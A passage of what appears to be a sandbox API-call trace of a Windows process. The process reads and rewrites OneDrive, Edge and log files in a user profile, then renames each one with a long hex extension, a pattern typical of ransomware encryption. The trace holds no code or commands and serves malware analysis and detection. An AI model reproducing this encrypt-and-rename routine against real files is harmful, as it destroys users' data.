IoStatusBlock=0x29fff60, FileInformation=0x63a7c0, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0112.957] CloseHandle (hObject=0x310) returned 1 [0112.957] GetProcessHeap () returned 0x600000 [0112.957] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0112.959] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0112.964] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x32a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x32a00f8, ReturnLength=0x29fff70) returned 0x0 [0112.965] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.LocalizedResources.dll", lpString2=".D73EDA3C101DC51136FBA28B42078FE6416AA54154669E22A4A850B7761FF50A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.LocalizedResources.dll.D73EDA3C101DC51136FBA28B42078FE6416AA54154669E22A4A850B7761FF50A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.LocalizedResources.dll.D73EDA3C101DC51136FBA28B42078FE6416AA54154669E22A4A850B7761FF50A" [0112.965] GetProcessHeap () returned 0x600000 [0112.965] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x3160f08 [0112.965] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x29fff60, FileInformation=0x3160f08, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0112.966] CloseHandle (hObject=0x324) returned 1 [0112.966] GetProcessHeap () returned 0x600000 [0112.966] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32a0048 | out: hHeap=0x600000) returned 1 [0112.967] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.313] WriteFile (in: hFile=0x324, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0113.314] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.623] ReadFile (in: hFile=0x324, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0113.623] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.626] WriteFile (in: hFile=0x324, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0113.629] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.632] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x29fff70) returned 0x0 [0113.632] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.LocalizedResources.dll", lpString2=".FC9C730C740C7ED7B5AD6CF9955883E4A6BAF059E75D7D66A4EE34378F1F5D14" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.LocalizedResources.dll.FC9C730C740C7ED7B5AD6CF9955883E4A6BAF059E75D7D66A4EE34378F1F5D14") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSync.LocalizedResources.dll.FC9C730C740C7ED7B5AD6CF9955883E4A6BAF059E75D7D66A4EE34378F1F5D14" [0113.632] GetProcessHeap () returned 0x600000 [0113.632] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x31601a0 [0113.632] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x29fff60, FileInformation=0x31601a0, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0113.633] CloseHandle (hObject=0x324) returned 1 [0113.634] GetProcessHeap () returned 0x600000 [0113.634] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0113.635] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.749] WriteFile (in: hFile=0x334, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0113.751] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.755] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0113.756] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcr120.dll", lpString2=".25BA080FD4AABFA4F22724BE6D185EA5734B67AD032F45D65CAEEE438B062473" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcr120.dll.25BA080FD4AABFA4F22724BE6D185EA5734B67AD032F45D65CAEEE438B062473") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcr120.dll.25BA080FD4AABFA4F22724BE6D185EA5734B67AD032F45D65CAEEE438B062473" [0113.756] GetProcessHeap () returned 0x600000 [0113.756] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x166) returned 0x315ea90 [0113.756] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x29fff60, FileInformation=0x315ea90, Length=0x166, FileInformationClass=0xa) returned 0x0 [0113.756] CloseHandle (hObject=0x334) returned 1 [0113.757] GetProcessHeap () returned 0x600000 [0113.757] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.758] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.829] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.830] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.830] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.833] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.834] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x29fff70) returned 0x0 [0113.834] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\RemoteAccess.dll", lpString2=".8641E5B52827F1D3698462FD0EBBE51AB8835A69544BDC675C2B8ABADE46135F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\RemoteAccess.dll.8641E5B52827F1D3698462FD0EBBE51AB8835A69544BDC675C2B8ABADE46135F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\RemoteAccess.dll.8641E5B52827F1D3698462FD0EBBE51AB8835A69544BDC675C2B8ABADE46135F" [0113.834] GetProcessHeap () returned 0x600000 [0113.834] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16e) returned 0x315e628 [0113.834] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x29fff60, FileInformation=0x315e628, Length=0x16e, FileInformationClass=0xa) returned 0x0 [0113.835] CloseHandle (hObject=0x334) returned 1 [0113.836] GetProcessHeap () returned 0x600000 [0113.836] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.836] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.838] ReadFile (in: hFile=0x310, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0113.838] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.839] WriteFile (in: hFile=0x310, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0113.839] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.840] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0113.840] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotLogo.png", lpString2=".4E89455312F1C124F3E8CBF8C419AFD16986ECF95865F505C4EBB256ED5C9531" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotLogo.png.4E89455312F1C124F3E8CBF8C419AFD16986ECF95865F505C4EBB256ED5C9531") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotLogo.png.4E89455312F1C124F3E8CBF8C419AFD16986ECF95865F505C4EBB256ED5C9531" [0113.840] GetProcessHeap () returned 0x600000 [0113.840] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x172) returned 0x318b7f0 [0113.840] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x29fff60, FileInformation=0x318b7f0, Length=0x172, FileInformationClass=0xa) returned 0x0 [0113.841] CloseHandle (hObject=0x310) returned 1 [0113.841] GetProcessHeap () returned 0x600000 [0113.842] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.844] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.847] ReadFile (in: hFile=0x310, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.847] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.848] WriteFile (in: hFile=0x310, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.849] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.850] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x29fff70) returned 0x0 [0113.850] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotOptIn.png", lpString2=".A737C45891E664A45B70BE708D7225B9D9DD4BFEFE232165673513166B986831" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotOptIn.png.A737C45891E664A45B70BE708D7225B9D9DD4BFEFE232165673513166B986831") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ScreenshotOptIn.png.A737C45891E664A45B70BE708D7225B9D9DD4BFEFE232165673513166B986831" [0113.850] GetProcessHeap () returned 0x600000 [0113.850] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x174) returned 0x318aa28 [0113.850] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x29fff60, FileInformation=0x318aa28, Length=0x174, FileInformationClass=0xa) returned 0x0 [0113.851] CloseHandle (hObject=0x310) returned 1 [0113.855] GetProcessHeap () returned 0x600000 [0113.855] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.855] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.879] ReadFile (in: hFile=0x310, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.879] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.898] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0113.898] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0113.966] WriteFile (in: hFile=0x310, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0113.966] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0114.074] ReadFile (in: hFile=0x310, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0114.074] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0114.078] WriteFile (in: hFile=0x330, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0114.078] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0114.081] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x29fff70) returned 0x0 [0114.082] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\WnsClientApi.dll", lpString2=".07A46B25AC596689495AD8D257A496165C29EF76DDCA84CEA62A27FAE7FE0C2B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\WnsClientApi.dll.07A46B25AC596689495AD8D257A496165C29EF76DDCA84CEA62A27FAE7FE0C2B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\WnsClientApi.dll.07A46B25AC596689495AD8D257A496165C29EF76DDCA84CEA62A27FAE7FE0C2B" [0114.082] GetProcessHeap () returned 0x600000 [0114.082] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16e) returned 0x315ff20 [0114.082] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x29fff60, FileInformation=0x315ff20, Length=0x16e, FileInformationClass=0xa) returned 0x0 [0114.083] CloseHandle (hObject=0x330) returned 1 [0114.083] GetProcessHeap () returned 0x600000 [0114.083] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0114.085] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0114.158] ReadFile (in: hFile=0x330, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0114.158] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0114.171] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x688540, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x688540, ReturnLength=0x29fff70) returned 0x0 [0114.174] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_131859_f38-f3c.log", lpString2=".A64851B60F24CB372EFF839C270B7D2ABE01382A961AAE94225BB487C9E60431" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_131859_f38-f3c.log.A64851B60F24CB372EFF839C270B7D2ABE01382A961AAE94225BB487C9E60431") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_131859_f38-f3c.log.A64851B60F24CB372EFF839C270B7D2ABE01382A961AAE94225BB487C9E60431" [0114.174] GetProcessHeap () returned 0x600000 [0114.174] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19c) returned 0x6b0960 [0114.174] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x29fff60, FileInformation=0x6b0960, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0114.175] CloseHandle (hObject=0x328) returned 1 [0114.175] GetProcessHeap () returned 0x600000 [0114.175] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0114.177] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0115.489] WriteFile (in: hFile=0x214, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0115.493] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0116.457] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x29fff70) returned 0x0 [0116.458] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".4FB75FD5B9F92C55D167BE0416EFB95EA691E43D5E7707CA610DD26DE500A96D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\settings.dat.4FB75FD5B9F92C55D167BE0416EFB95EA691E43D5E7707CA610DD26DE500A96D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\settings.dat.4FB75FD5B9F92C55D167BE0416EFB95EA691E43D5E7707CA610DD26DE500A96D" [0116.458] GetProcessHeap () returned 0x600000 [0116.458] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18e) returned 0x6b2c68 [0116.458] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x29fff60, FileInformation=0x6b2c68, Length=0x18e, FileInformationClass=0xa) returned 0x0 [0116.469] CloseHandle (hObject=0x32c) returned 1 [0116.469] GetProcessHeap () returned 0x600000 [0116.469] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.473] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0116.516] ReadFile (in: hFile=0x214, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0116.516] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0116.544] ReadFile (in: hFile=0x320, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.544] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: 